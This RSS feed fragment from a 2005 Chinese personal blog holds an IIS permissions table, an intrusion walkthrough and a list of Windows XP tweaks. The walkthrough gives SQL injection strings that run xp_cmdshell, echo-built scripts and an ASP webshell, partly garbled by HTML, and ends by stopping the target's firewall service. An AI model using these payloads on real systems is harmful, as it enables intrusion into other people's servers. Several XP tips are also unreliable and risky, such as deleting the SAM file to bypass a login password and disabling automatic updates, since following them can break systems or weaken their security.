control <br />%windir%\help\iishelp\common System Full control <br />%windir%\help\iishelp\common IIS_WPG Read <br />%windir%\help\iishelp\common Users (See Note 1.) Read, execute <br />%windir%\IIS Temporary Compressed Files Administrators Full control <br />%windir%\IIS Temporary Compressed Files System Full control <br />%windir%\IIS Temporary Compressed Files IIS_WPG List, read, write <br />%windir%\IIS Temporary Compressed Files Creator owner Full control <br />%windir%\system32\inetsrv Administrators Full control <br />%windir%\system32\inetsrv System Full control <br />%windir%\system32\inetsrv Users Read, execute <br />%windir%\system32\inetsrv\*.vbs Administrators Full control <br />%windir%\system32\inetsrv\ASP compiled templates Administrators Full control <br />%windir%\system32\inetsrv\ASP compiled templates IIS_WPG Read <br />%windir%\system32\inetsrv\History Administrators Full control <br />%windir%\system32\inetsrv\History System Full control <br />%windir%\system32\Logfiles Administrators Full control <br />%windir%\system32\inetsrv\metaback Administrators Full control <br />%windir%\system32\inetsrv\metaback System Full control <br />Inetpub\Adminscripts Administrators Full control <br />Inetpub\wwwroot (or content directories) Administrators Full control <br />Inetpub\wwwroot (or content directories) System Full control <br />Inetpub\wwwroot (or content directories) IIS_WPG Read, execute <br />Inetpub\wwwroot (or content directories) IUSR_MachineName Read, execute <br />Inetpub\wwwroot (or content directories) ASPNET (See Note 2.)　Read, execute <br /><br />Note 1 You must have permissions to this directory when you use Basic authentication or Integrated authentication and when custom errors are configured. For example, when error 401.1 occurs, the logged-on user sees the expected detailed custom error only if permissions to read the 4011.htm file have been granted to that user. <br /><br />Note 2 By default, ASP.NET is used as the ASP.NET process identity in IIS 5.0 isolation mode. If ASP.NET is switched to IIS 5.0 isolation mode, ASP.NET must have access to the content areas. ASP.NET process isolation is detailed in IIS Help. For additional information, visit the following Microsoft Web site: <br /><br />ASP.NET process isolation <br /><a href="http://www.microsoft.com/technet/treeview/default.asp?url=/technet/prodtechnol" target="_blank"><font color="#003366">http://www.microsoft.com/technet ... technet/prodtechnol</font></a> <br />/windowsserver2003/proddocs/standard/aaconruntimeprocessisolation.asp <br /><br />Registry permissions <br />Location Users\Groups Permissions <br />HKLM\System\CurrentControlSet\Service\ASP Administrators Full control <br />HKLM\System\CurrentControlSet\Service\ASP System Full control <br />HKLM\System\CurrentControlSet\Service\ASP IIS_WPG Read <br />HKLM\System\CurrentControlSet\Service\HTTP Administrators Full control <br />HKLM\System\CurrentControlSet\Service\HTTP System Full control <br />HKLM\System\CurrentControlSet\Service\HTTP IIS_WPG Read <br />HKLM\System\CurrentControlSet\Service\IISAdmin Administrators Full control <br />HKLM\System\CurrentControlSet\Service\IISAdmin System Full control <br />HKLM\System\CurrentControlSet\Service\IISAdmin IIS_WPG Read <br />HKLM\System\CurrentControlSet\Service\w3svc Administrators Full control <br />HKLM\System\CurrentControlSet\Service\w3svc System Full control <br />HKLM\System\CurrentControlSet\Service\w3svc IIS_WPG Rea<br /><br /></span></p>]]></description> 
<guid isPermaLink="false">2066920@http://maxgo.bokee.com/</guid> 
<dc:subject>原创天空</dc:subject> 
<dc:date>2005-06-26T09:07:29Z</dc:date> 
</item> 
<item> 
<title><![CDATA[只开80端口主机的入侵思路]]></title> 
<link>http://maxgo.bokee.com/1158419.html</link> 
<description><![CDATA[<span>主机配置:win2kserver(sp3)+sygate personal firewall pro <br />安全设置：不说啦太变态了竟然只允许80进 <br /><br /><br />扫描：先用x-scan2.3扫端口晕只开80，然后又扫了一遍 <br />唉还是一样的结果，看来管理员也不算笨啊! <br /><br />检查系统洞洞:先ping了一下竟然ping不通,不过有刚才的扫描结果就很明 <br />白了应是iis5再加上网页上明显用的asp这样的主机当然是win2k不用 <br />说咯. <br /></span><br />分析:唉也没什么可以分析咯只能从80入手,看看上面都有些什么东东 <br />有一个查询系统输入单引号试试,返回 <br />错误类型： <br />Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) <br />/mingce/student1.asp, 第 30 行 <br /><br />看来运气也不算太坏嘛........应该有sql注入的毛病......... <br />为了进一步确认试试运气输http://x.x.x.x//mingce/student1.asp.BAK <br />的确可以正确提交哟返回如下: <br /><br />if request.form(&amp;quot;xsxm&amp;quot;)=&amp;quot;&amp;quot; and request.form(&amp;quot;xsxh&amp;quot;)=&amp;quot;&amp;quot; then <br />Set Conn=Server.CreateObject(&amp;quot;ADODB.Connection&amp;quot;) <br />Conn.Open &amp;quot;Driver={sql server};Server=localhost;Database=xxxx;UID=sa;PWD=&amp;quot;&amp;amp;application(&amp;quot;mm_xxx&amp;quot;) <br /><br />比较长只是上面三行最重要了:我们可以看出ASP后台程序没用对用户提交进行任何的 <br />过滤,同时数据库用的ADODB.Connection对象(如果是ADODB.Command就算没有过滤 <br />特殊符号也不行的),当然也可以看出数据库使用的sa来连接的! <br /><br />(Tip:其实就算我们看不到ASP的源代码我们也可以试试xp_cmdshell 'iisreset /reboot' <br />或是xp_cmdshell 'ping 你.的.I.P',如果第一个命令能执行成功那么在半分钟之内远程 <br />系统会重启一次的，第二个命令你自已的机子的防火墙通常会提示来至x.x.x.x的主机向你 <br />发送ICMP数据,不过对于这种禁止任何数据出的主机第二个命令可能也不行哟) <br /><br /><br />好了通过上面的分析我们可以做什么呢: <br />通过在web页以管理员的身份来执行系统命令(不过没有回显的) <br />如果是一般的系统主机简单了xp_cmdshell 'net user .....'我就不写了 <br />但是我们现在环境是系统只开了80端口,就算我们能加ADMIN用户也没用三 <br />以前通常只要开个139/445/135就可以远程管理了不过现在不行. <br /><br />我的思路: <br />1)找到web目录的路径 <br />2)写入一个简单的cmd.asp用来找到防火墙的具体名字 <br />3)通过xp_cmdshell来关闭防火墙服务 <br /><br /><br />具体实现: <br />第一步明显是最难的咯 <br />我本来打算用adminＳcripts里面的建web站的方式建一个我自已的可执行目录的 <br />结果不行哟.然后就想到了使用adsutil.vbs程序我是这样执行的 <br />a';exec master..xp_cmdshell 'cmd /c cscript c:\inetpub\adminscrips\adsutil.vbs enum w3svc/1/root&amp;gt;a.txt';-- <br />是不是很长啦<a href="http://www.netxeyes.org/image/bbs3000/regular_smile.gif" target="_blank"></a>通过它我们可以把iis里面第一个虚拟web站点的设置情况(当然包括它所在的实际目录咯)导入到a.txt中 <br />对于a.txt的实际位置默认当然是c:\winnt\system32,其实这都不是问题，不过遇到管理员把adsutil.vbs删了或是放到别 <br />的地方我们就没办法了(不可能自已用echo 命令写一个吧) <br /><br />第二步:用echo命令写下面的代码到c:\中,很多吗也不算吧<a href="http://www.netxeyes.org/image/bbs3000/regular_smile.gif" target="_blank"></a> <br /><br />.....xp_cmdshell 'echo set fso1=createobject(&amp;quot;scripting.filesystemobject&amp;quot;)&amp;gt;c:\read.vbs';-- <br />.....xp_cmdshell 'echo Set WshShell = Wscript.CreateObject(&amp;quot;Wscript.Shell&amp;quot;)&amp;gt;&amp;gt;c:\read.vbs';-- <br />..... <br />-------------------read.vbs--------------------------------- <br />set fso1=createobject(&amp;quot;Ｓcripting.filesystemobject&amp;quot;) <br />Set WshShell = WＳcript.CreateObject(&amp;quot;WＳcript.Shell&amp;quot;) <br />spa=WshShell.Environment(&amp;quot;process&amp;quot;)(&amp;quot;windir&amp;quot;) <br />set fil =fso1.opentextfile(spa &amp;amp; &amp;quot;\system32\aa.txt&amp;quot;) <br />do while not fil.atendofstream <br />nr=fil.readline <br />if left(nr,4)=&amp;quot;Path&amp;quot; then <br />pa=mid(nr,instr(nr,&amp;quot;)&amp;quot;)+3,len(nr)-instr(nr,&amp;quot;)&amp;quot;)-3) <br />exit do <br />end if <br />loop <br />set fil1 =fso1.opentextfile(pa&amp;amp;&amp;quot;\dd.asp&amp;quot;,2,true) <br />fil1.writeline &amp;quot;<!--sponse.write request.servervariables(""APPL_PHYSICAL_PATH""-->&amp;quot; <br />---------------cut here-------------------------------------- <br /><br />第三步:当然就是执行read.vbs三,这样我们可以把aa.txt中的内容读出来找到web站点的实际路径 <br />然后写一个叫dd.asp的文件在web站的根目录中,能否成功试试就知道咯 <br />执行http://x.x.x.x/dd.asp <br />返回<a href="http://www.netxeyes.org/image/bbs3000/teeth_smile.gif" target="_blank"></a>:\xxx <br /><br />看来我运气就是不错的哈(其实有个问题是我们找的第一个web站点可能并不能通过x.x.x.x来仿问) <br /><br />第四步:就是用echo命令生成cmd.asp,唉也不算长嘛也就20行而已 <br />其实在有的网站上(通常是虚拟主机)cmd.asp是不能执行的,不过这台主机是独立的服务器 <br />所以管理员就没有禁止了 <br /><br />--------------------------cmd.asp------------------------------ <br /><!-- Error Resume Next <br />Set oＳcript = Server.CreateObject(""WＳcript.SHELL"") <br />Set oＳcriptNet = Server.CreateObject(""WＳcript.NETWORK"") <br />Set oFileSys = Server.CreateObject(""Ｓcripting.FileSystemObject"") <br />szCMD = Request.Form("".CMD"") <br />If (szCMD <> """")Then <br />szTempFile = ""C:\" &amp; oFileSys.GetTempName() <br />Call oＳcript.Run (""cmd.exe /c "" &amp; szCMD &amp; "" > "" &amp; szTempFile, 0, True) <br />Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) <br />End If--><br /><form action="" <%="Request.ServerVariables(""URL"")%">&amp;quot;&amp;quot; method=&amp;quot;&amp;quot;POST&amp;quot;&amp;quot;&amp;gt; <br /><input size="45" name="" <%="szCMD" %="" .cmd??="" />&amp;quot;&amp;quot;&amp;gt;<input type="submit" run??="" /> <br /></form><pre> <br /><!--f (IsObject(oFile))Then <br />On Error Resume Next <br />Response.Write Server.HTMLEncode(oFile.ReadAll) <br />oFile.Close <br />Call oFileSys.DeleteFile(szTempFile, True) <br />End I--> <br /> <br />-----------------------cut here-------------------------------- <br /><br />第五步:执行cmd.asp三,这样我们可以找到系统上到底安的是什么防火墙,找啊找没多久我找到了 <br />e:\progra~1\sygate\spf,就是它不用说了嘛sygate personal firewall pro(具体版本在cmd.asp <br />里执行echo readme.txt不就明白了) <br /><br />第六步:关闭sygate的防火墙 <br />a';exec master..xp_cmdshell 'net stop smcservice';-- <br />(smcservice是sygate防火墙的服务名) <br /><br />第七步:看一看成功了吗?用x-scan扫,现在就对了三53,139,135,1433......都出来了 <br />第八步:添加系统管理员打开telnet............ <br /><br /><br />唉打了半天反正就是这样了...其实我想应该还有好的办法只是我没想到吧....... <br />比如说用echo命令写一个ftp脚本来下载一个httptunel之类的程序然后再打开telnet <br />....当然你也可能想得到更简单的办法就是猜web站点的实际目录...... <br /><br />
</pre>]]></description> 
<guid isPermaLink="false">1158419@http://maxgo.bokee.com/</guid> 
<dc:subject>经典案例</dc:subject> 
<dc:date>2005-04-10T14:09:05Z</dc:date> 
</item> 
<item> 
<title><![CDATA[XP系统优化超简单实用版]]></title> 
<link>http://maxgo.bokee.com/1059306.html</link> 
<description><![CDATA[<p>1。关闭计算机时自动结束任务： </p><p>在关机的时候，有时会弹出讨厌的对话框，提醒某个程序仍在运行，是否结束任务。其实完全可以通过一点点修改让Windows自动结束这些仍在运行的程序。在注册表中打开HKEY_CURRENT_USER＼Control Panel＼Desktop 目录，把里面的AugoEndTasks键值改为1</p><p>2。INTERNET时间同步</p><p>如果你使用时间同步~那么你的计算机每到一定时间就会和Internet上的时间服务器进行核对 浪费一些内存 建议关掉他因为你的计算机一开始调对时间的话几乎不错出现时间偏差&amp;#160; 关闭方法<br />开始→控制面版→日期时间语言和区域选项→日期和时间→Internet时间<br />关闭同步就OK了~</p><br><p>3。关掉快速切换用户功能</p><p>WIN XP的一个引人注目的功能叫做&amp;quot;快速切换&amp;quot;这个功能为许多用户在同一时间使用电脑提供了可能但是这项功能也要消耗一定量的内存如果你的内存是64M WIN XP安装的时候就会自动禁止这项功能~对于128M的用户也会有点吃不消所以建议还是关掉吧~&amp;#160; 方法 控制面板→用户帐户→更改用户登陆或注销方式 去掉&amp;#160; 使用快速用户切换&amp;#160; 就可以了~</p><p>4。加快菜单显示速度 </p><p>打开注册表编辑器，找到 HKEY_CURRENT_USER＼Control Panel＼Desktop，将其下的 MenuShowDelay 项(400)改为：0，你的菜单将会出乎意料地快</p><p>5。删除系统备份</p><p>XP系统会自动记录一些硬件配置和注册表关键信息其实我们完全不需要这样当系统崩溃的时候我们完全可以用事先备份好多GHOST来恢复系统<br />删除系统文件备份&amp;#160; 开始→运行→输入 sfc.exe/purgecache 回车（节约300MB+呢~） </p><p>同上是XP系统备份的驱动程序删除驱动备份windows&amp;#92;drivercache&amp;#92;i386目录下的Driver.cab文件（73mb）<br />&amp;#160;<br />系统自动备份的*.dll文件 我们一般可以删除掉他删掉&amp;#92;WINDOWS&amp;#92;system32&amp;#92;dllcache下文件（减去200--300mb）（这是备用的dll文件，只要你拷贝了安装文件，完全可以这样做。既然这样删你没话说） </p><p>6。删除WINDOWS XP帮助文件</p><p>XP系统附带了很详细删除帮助文件，帮助你更好的了解XP系统的各种新的功能和配置使你能更好的（如果你对WINDOWS还不了解那请不要删除帮助文件）</p><p>7。系统变量设置</p><p>把我的文档、IE的临时文件夹都转到其他盘（分区）。（同时对系统的速度，和硬盘都有好处）</p><p>如果使用的是双系统，最好把两个系统的IE临时文件都放在同一个文件夹，这样既加快速度有节省<a href="http://idc.77169.com/"><font color="#f73809">空间</font></a>） </p><p>把虚拟内存也转到其他盘。（就是将这些东西和平时临时下载文件放在一个不大的分区里，这样也方便整理硬盘）</p><p>将应用软件装在其他盘（这对重装系统也有好处，可以省很多事）。 </p><p>8。删除多余输入法和多余语言种类</p><p>删除&amp;#92;windows&amp;#92;ime下不用的输入法！（日文，韩文，繁体中文输入法，84.5MB）（到底哪个是哪个自己研究一下吧！有时候也要自己动动脑子的，锻炼一下吧！） </p><p>删除不需要的输入法 <br />鼠标右击桌面右下角的输入法图标，可以删去不要的输入法，这谁都知道，可你看看硬盘空</p><p>间并没有减少，这是为什么呢？原来Windows并没有删除掉那些输入法的相关文件，还得我们</p><p>自己手动删除。以下是Windows自带的输入法的相关文件列表。 <br />全拼：Winpy.ime、Winpy.mb、Winpy.hlp、Winpy.cnt。 <br />双拼：Winsp.ime、Winsp.mb、Winsp.hlp、Winsp.cnt。 <br />微拼：Pintllime.dll、Pintlgab.imd、Pintlgai.imd、Pintlgb.imd、Pintlgd.imd、</p><p>Pintlgdx.imd、Pintlgie.imd、Pintlgnt.cnt、Pintlgnt.hlp、Pintlgnt.i96、</p><p>Pintlgnt.ime、Pintlgrb.imd、Pintlgri.imd、Pintlgs.imd、Pintlgsi.imd、Pintlgsx.imd</p><p>、Pintlgu.imd、Pintlguc.imd、Pintlphr.exe。 <br />智能ABC：Winabc.cwd、Abcsda.dll、Abcwin.exe、Winabc.ime、Winabc.ovl、tmmr.rem、</p><p>user.rem、Winabc.hlp、Winabc.cnt。 <br />郑码：Winzm.ime、Winzm.mb、Winzm.hlp、Winzm.cnt。 <br />内码输入法：Wingb.mb、Wingb.hlp、Wingb.cnt。 <br />表形码：Winbx.mb，Winbx.ime，Winbx.hlp，Winbx.cnt</p><p>9。关掉多余系统报告</p><p>如果你的系统崩溃时发现你的硬盘使劲儿的响，那是因为windowsXP正在写DUMP文件呢，对我们来说根本没用你还能把这一错误发给微软吗？~<br />完全没必要如果关闭呢~点机 我的电脑→属性→高级→启动和故障恢复→设置→<br />系统失败 中只选自动重起 不选写入调试信息</p><p>10。删除共享文档： </p><p>默认情况下，在Windows XP中打开我的电脑，会看到在硬盘图标上方有一些文件夹。这些就是&amp;quot;共享文件夹&amp;quot;，这里有每一个用来户共享文件所用的文件夹。这些文件夹特别烦人，毫无必要。我们可以让这些文件夹在我的电脑中消失：打开注册表编辑器，把HKEY_LOCAL_MACHINE＼SOFTWARE＼Microsoft＼Windows＼CurrentVersion＼Explorer＼MyComputer＼NameSpace＼DelegateFolders下的 <br />{59031a47-3f72-44a7-89c5-5595fe6b30ee}删掉，下次打开我的电脑，这些烦人的文件夹就不复存在了~</p><p>11。缩短程序响应等待时间 </p><p>打开注册表编辑器</p><p>找到 HKEY_LOCAL_MACHINE＼System＼CurrentControlSet＼Control，将 WaitToKillServiceTimeout 设为：1000或更小（原设定值：20000）。</p><p>找到 HKEY_CURRENT_USER＼Control Panel＼Desktop 键，将右边窗口的 WaitToKillAppTimeout 改为 1000（原设定值：20000），即关闭程序时仅等待1秒。将 HungAppTimeout 值改为：200（原设定值：5000），表示程序出错时等待0.5秒</p><p>12。系统加速</p><p>手动识别cpu的二级缓存，以改善cpu的性能：<br />找到&amp;quot;[HKEY_LOCAL_MACHINE&amp;#92;SYSTEM&amp;#92;CurrentControlSet&amp;#92;Control&amp;#92;Session Manager&amp;#92;Memory Management&amp;#92;SecondLevelDataCache]&amp;quot;;修改其十进制:<br />AMD Duron: 64(kb);<br />CeleronA/celeron2:128;<br />PII/PIII E(EB)/P4/AMD K6-3/AMD THUNDERBird/Cyrix III:256;<br />AMD K6-2/PII/PIII katmai/AMD Athlon:512;<br />PII Xeon/PIII Xeon:1024;</p><p>修改磁盘缓存以加速xp，磁盘缓存对xp运行起着至关重要的作用，但是默认的I/O页面文件比较保守。<br />去[HKEY_LOCAL_MACHINE&amp;#92;SYSTEM&amp;#92;CurrentControlSet&amp;#92;Control&amp;#92;Session Manager&amp;#92;Memory Management&amp;#92;IoPageLockLimit];<br />根据你的内存修改其十六进制值:<br />64M: 1000;<br />128M: 4000;<br />256M: 10000;<br />512M或更大: 40000.</p><p>预读设置以提高速度，xp使用预读设置这一新技术，以提高系统速度。<br />去[HKEY_LOCAL_MACHINE&amp;#92;SYSTEM&amp;#92;CurrentControlSet&amp;#92;Control&amp;#92;Session Manager&amp;#92;Memory Management&amp;#92;PrefetchParameters&amp;#92;EnablePrefetcher];<br />设置数值0，1，2，3。0-Disable,1-预读应用程序,2-启动预读,3-前两者皆预读(&amp;quot;3&amp;quot;，推荐使用)。当然如果你图的就是个快你就选 0 </p><p>13。让系统自动关闭停止回应的程式。 </p><p>打开注册表HKEY_CURRENT_USER&amp;#92;ControlPanel&amp;#92;Desktop键，将AutoEndTasks值设为1。(原设定值：0) </p><p>MsConfig。大多数朋友都应该熟识MsConfig了，这是一个系统内置的Windows设置工具。<br />点击开始菜单，选择&amp;quot;运行&amp;quot;，然后在录入框中敲入&amp;quot;msconfig&amp;quot;回车。我们要动手脚的是（启动）选项卡，点击它，这个选项卡中显示了Windows启动时运行的所有程序。这里没有一个程序对Windows来说是生死悠关的，所以放心大胆地把不要的去掉。把部分勾勾去掉之后，Windows启动会快些，同时空闲的系统资源也会多出一些。</p><p>14。系统稳定优化设置。 </p><p>关掉调试器Dr.Watson； <br />Dr.Watson是自带的系统维护工具，它会在程序加载失败或崩溃时显示。运行drwtsn32，把除了&amp;quot;转储全部线程上下文&amp;quot;之外的全都去掉。否则一旦有程序出错，硬盘会响很久，而且会占用很多<a href="http://idc.77169.com/"><font color="#f73809">空间</font></a>。如果你以前遇到过这种情况，请查找user.dmp文件并删掉，可能会省掉几十MB的<a href="http://idc.77169.com/"><font color="#f73809">空间</font></a>。</p><p>15。系统修复维护</p><p>关闭&amp;quot;系统还原&amp;quot;从WIN2000开始WIN就不附带DOS操作系统了而是系统还原方式当然这种方式很简单适合对DOS不太了解的用户使用 但是确浪费了大量的磁盘<a href="http://idc.77169.com/"><font color="#f73809">空间</font></a>和内存<a href="http://idc.77169.com/"><font color="#f73809">空间</font></a>。关闭系统还原方法采用鼠标右健单击桌面上的&amp;quot;我的电脑&amp;quot;，选择&amp;quot;属性&amp;quot;，找到&amp;quot;系统还原&amp;quot;，如果你会利用DOS来修复系统的话这样可以节省好多<a href="http://idc.77169.com/"><font color="#f73809">空间</font></a>。 </p><p>关闭&amp;quot;休眠支持&amp;quot;：因为休眠功能占的硬碟<a href="http://idc.77169.com/"><font color="#f73809">空间</font></a>蛮大的,所以关闭比较好, <br />控制台--&amp;gt;电源选项--&amp;gt;休眠(不要打勾)关掉休眠可以节约一些硬盘<a href="http://idc.77169.com/"><font color="#f73809">空间</font></a>和内存</p><p>16。优化程序运行 </p><p>程序运行有他们各自的优先次序，所有程序都要占用处理器资源，处理器处理任务有一个先后次序，一般的计算机中有31个优先等级，系统的内核占据了最高的一些等级，这样就能保证系统的稳定，而普通的应用程序一般在比较后面的等级。在普通应用程序中间也有优先次序，他们本来在处理器面前是人人平等的，但还是有些细微的差别，前台的程序（当前正在使用）的优先级要比后台的程序高。你可以自己调节应用程序的优先级，打开任务管理器，点到&amp;quot;进程&amp;quot;选项卡，选一个应用程序的进程，点击右键，会弹出一个快捷菜单，选择&amp;quot;设置优先级&amp;quot;，这里有6个等级：实时，高，高与标准，标准，低于标准，低。你可以让你的程序强行调度到更高或更低（自然为别的程序腾出了资源）的等级。如果你不知道某个应用程序的具体进程，可以如下操作：点到&amp;quot;应用程序&amp;quot;选项卡，右键点中一个任务，选择&amp;quot;转到进程&amp;quot;，就会转到该程序的进程，这样你就找到了该程序的进程了。</p><p>17。拒绝分组相似任务栏 </p><p>虽然Windows XP &amp;quot;分组相似任务栏按钮&amp;quot;设置虽然可以让你的任务栏少开窗口，保持干净，但对于一些需要打开同类多个窗口的工作非常不便。如你是经常用QQ这样的通讯软件和人在线聊天的话，如果有两个以上的好友同时和你交谈，你马上会感到XP这种默认设置造成的不便 D D每次你想切换交谈对象的时候，要先点击组，然后弹出的菜单里再选要交谈的好友，而且每个好友在组里显示的都是一样的图标，谈话对象多的时候，你可能要一个个的点击来看到底刚才是谁回复了话，在等着你反应，而且选错了一个，又得从组开始选，很麻烦。显然地，这样不如原来的开出几个窗口，在任务栏里的各个小窗口点击一次就可进行开始聊天。更改方法：点击&amp;quot;开始→控制面板→外观和主题→任务栏和‘开始&amp;#39;菜单&amp;quot;，在弹出的窗口内，将&amp;quot;分组相似任务栏按钮&amp;quot;选项前面的钩去掉。</p><p>18。修改Windows XP的登录背景图案 </p><p>面对长久不变的单调的登录图案，你可能日久生厌，我们可以通过注册表来把它换成自己喜欢的图案，步骤如下：打开注册表编辑器，找到HKEY_USERS&amp;#92;.DEFAULT&amp;#92;Control Panel&amp;#92;Desktop子键分支，双击wallpaper，键入你选择好的图片的路径，如：c:&amp;#92;Documents and Settings&amp;#92;My Documents&amp;#92;My Pictures&amp;#92;mypic.bmp，点击&amp;quot;确定&amp;quot;，然后找到Tilewallpaper，双击它输入键值&amp;quot;1&amp;quot;，重新启动系统即可看到效果。</p><p>19。让Win XP支持137 GB以上大硬盘 </p><p>想要使用137 GB以上大硬盘，必须使用48位LBA模式。首先你的主板BIOS必须支持48Bit LBA，其次Win XP家用版和专业版必须安装SP1补丁。然后打开注册表，在如下路径&amp;quot;HKEY_LOCAL_MACHINE System CurrentControlSet Services Atapi Parameter&amp;quot;找到&amp;quot;EnableBigLba&amp;quot;选项，将其值由&amp;quot;0&amp;quot;改为&amp;quot;1&amp;quot;。如果该项不存在，可以自建&amp;quot;DWORD值&amp;quot;项目，同样设置.最后重新启动即可。　　 </p><p>20。解决任务栏假死 </p><p>&amp;quot;控制面板&amp;quot;-&amp;gt;&amp;quot;区域和语言选项&amp;quot;-&amp;gt;&amp;quot;语言&amp;quot;-&amp;gt;&amp;quot;详细信息&amp;quot;，在弹出的&amp;quot;设置窗口&amp;quot;中选择&amp;quot;首选项&amp;quot;的&amp;quot;语言栏&amp;quot;，关闭&amp;quot;在桌面上显示语言栏&amp;quot;，在第三项&amp;quot;在通知区域显示其他语言栏图标&amp;quot;复选框上打上勾。如果不需要手写识别、语音识别的话，也可以再勾选最后一项&amp;quot;关闭高级文字服务&amp;quot;。 </p><p>21。每次启动时保持桌面设置不变 </p><p>我们可以通过修改注册表来保护我们的桌面设置，无论做了什么样的修改，只要重新启动之后桌面就会恢复原样。步骤如下：打开注册表编辑器，找到HKEY_CURRENT_USERS&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Polices&amp;#92;Explorer子键分支，在它的下面找到NoSaveSettings，其类型为REG_SZ，将其键值改为&amp;quot;0&amp;quot;，或者直接删除该键值项，重新启动系统使设置生效。 <br />　　<br />22。更改Windows XP序列号 </p><p>在Windows XP安装完毕以后，可能由于某些原因你又想在已经安装完毕的Windows XP上更改序列号，该怎么办呢？使用激活向导可以满足你的要求。 </p><p>注意：开始之前，建议你在修改之前作一个系统备份推荐使用GHOST，以免误操作引起不必要的麻烦。 </p><p>点击&amp;quot;开始&amp;quot;→&amp;quot;运行&amp;quot;，输入regedit后回车，打开注册表编辑器，定位到HKEY_LOCAL_MACHINE&amp;#92;Software&amp;#92;Microsoft&amp;#92;WindowsNT&amp;#92;Current Version&amp;#92;WPAEvents，在右边右键单击OOBETimer，然后选择修改，至少修改一个字节，确定保存。 </p><p>点击&amp;quot;开始&amp;quot;→&amp;quot;运行&amp;quot;，输入%systemroot%&amp;#92;system32&amp;#92;oobe&amp;#92;msoobe.exe /a，选择通过电话激活以后点击&amp;quot;下一步&amp;quot;，点击修改序列号，输入新的序列号以后选择&amp;quot;更新&amp;quot;，如果退回到前一个画面，那么选择稍后激活，并重新启动，反复前面的步骤直到修改成功为止，重新激活。点击确定，安装SP1。 </p><p>如果你安装SP1以后不能重新启动，那么启动的时候按F8，选择使用&amp;quot;最后一次正确的配置&amp;quot;，然后重复以上流程。本方法适用于Windows XP Professional。 </p><p>23。禁止脚本错误报告</p><p>当IE遇到页面中的脚本错误时，它会报告错误。除非你在调试自己的程序，否则即使知道了错误的详细信息，也没有任何办法来改正错误。所以对大多数用户来说，报告脚本错误是一个中看不中用的功能。禁止浏览器报告脚本错误的办法如下： <br />从IE的工具菜单选择&amp;quot;Internet选项&amp;quot;。 选择&amp;quot;高级&amp;quot;选项卡。向下滚动列表，找到&amp;quot;浏览&amp;quot;区域。 找到&amp;quot;禁止脚本调试&amp;quot;，选中前面的检查框。 </p><p>24。忘记登陆口令的解决办法 </p><p>Windows XP对用户安全性的审核即是非常严格的，大家知道，Windows XP中对用户帐户的安全管理使用了安全帐号管理器(Security Account Manager,SAM)的机制，安全帐号管理器对帐号的管理是通过安全标识进行的，安全标识在帐号创建时就同时创建，一旦帐号被删除，安全标识也同时被删除。安全标识是唯一的，即使是相同的用户名，在每次创建时获得的安全标识都时完全不同的。因此，一旦某个帐号被删除，它的安全标识就不再存在了，即使用相同的用户名重建帐号，也会被赋予不同的安全标识，不会保留原来的权限。 </p><p>安全账号管理器的具体表现就是%SystemRoot%&amp;#92;system32&amp;#92;config&amp;#92;sam文件。SAM文件是Windows NT/2000/XP的用户帐户数据库，所有用户的登录名及口令等相关信息都会保存在这个文件中。知道了这些我们的解决办法也产生了：在系统启动前，插入启动盘，进入C:&amp;#92;WINNT&amp;#92;System3&amp;#92;Config&amp;#92;，用ren命令将SAM文件改名，或用del命令将SAM文件删除，重启电脑即可。改名或删除SAM文件以后，试用Administrator登录，密码为空，成功了。 </p><p>25。压缩文件夹 <br />这是一个相当好的优化，Windows XP内置了对.ZIP文件的，我们可以把zip文件当成文件夹浏览。不过，系统要使用部分资源来实现 这一功能，因此禁用这一功能可以提升系统性能。实现方法非常简单，只需取消zipfldr.dll的注册就可以了，点击开始——运行，敲入： regsvr32 /u zipfldr.dll。然后回车即可。</p><p>26。关掉不必要的服务 <br />单击&amp;quot;开始&amp;quot;→&amp;quot;设置&amp;quot;→&amp;quot;控制面板&amp;quot;。双击&amp;quot;管理工具&amp;quot;→&amp;quot;服务&amp;quot;，打开后将看到服</p><p>务列表，有些服务已经启动，有些则没有。右键单击要配置的服务，然后单击&amp;quot;属性&amp;quot;。在</p><p>&amp;quot;常规&amp;quot;选项卡上选择&amp;quot;自动&amp;quot;、&amp;quot;手动&amp;quot;或&amp;quot;禁用&amp;quot;，其中&amp;quot;自动&amp;quot;表示每次系统启动时</p><p>，WindowsXP都自动启动该服务；&amp;quot;手动&amp;quot;表示WindowsXP不会自动启动该服务，而是在你需</p><p>要该服务时手动启动该服务；而&amp;quot;禁用&amp;quot;则表示不允许启动该服务。在实际配置时，选择&amp;quot;</p><p>手动&amp;quot;或者&amp;quot;禁用&amp;quot;都可以实现关闭该服务的目的，推荐使用手动功能，这样你随时可以启</p><p>动一些临时需要的服务。有些服务是WindowsXP所必需的，不能关闭，否则将会造成系统崩溃</p><p>。至于各项服务 <br />的功能，我们可以通过双击该服务或将鼠标悬停在该服务名上查看。具体服务的说明浅显，</p><p>大家看得懂，可以自己选择那些要那些不要。修改的方法是：选中禁用的服务，点右键，选&amp;quot;</p><p>属性&amp;quot;&amp;gt;&amp;quot;停止&amp;quot;，将&amp;quot;启动类型&amp;quot;设置为&amp;quot;手动&amp;quot;或&amp;quot;已禁用&amp;quot;。 <br />以下为一些不常用的服务: <br />Alerter-错误警报器。禁用 <br />AutomaticUpdates-windows自动更新，不影响手动更新。禁用 <br />Clipbook-与局域网电脑共享粘贴/剪贴的内容。禁用 <br />ErrorReportingService-错误报告器。禁用 <br />FastUserSwitchingCompatibility－多用户快速切换服务，不如用注销了。禁用 <br />HelpandSupport-帮助。手动 <br />HumanInterfaceDeviceAccess-支持多媒体键盘等HID设备。手动 <br />IMAPICD-BurningCOMService-有其他的刻录软件就不需要了。禁用 <br />IndexingService-索引服务，用于快速查找文件，关闭也能查。手动 <br />IPSECServices-安全方面的。手动 <br />NetMeetingRemoteDesktopSharing-用Netmeeting实现电脑共享。禁用 <br />NetworkDDE-禁用 <br />NetworkDDEDSDM-禁用 <br />PerformanceLogsandAlerts-记录机器运行状况而且定时写入日志或发警告。手动 <br />PortableMediaSerialNumber-禁用 <br />PrintSpooler-打印机服务，关掉就无法打印了，视情况而定。手动 <br />RemoteDesktopHelpSessionManager-远程帮助服务，禁用 <br />RemoteRegistry-远程注册表运行／修改。大漏洞，禁用 <br />RoutingandRemoteAccess-路由服务。禁用 <br />SecondaryLogon-给与administrator以外的用户分配指定操作权．手动 <br />SecurityAccountsManager-像ProtectedStorage,IISAdmin才需要。手动 <br />SmartCard-智能卡服务，我没用过。手动 <br 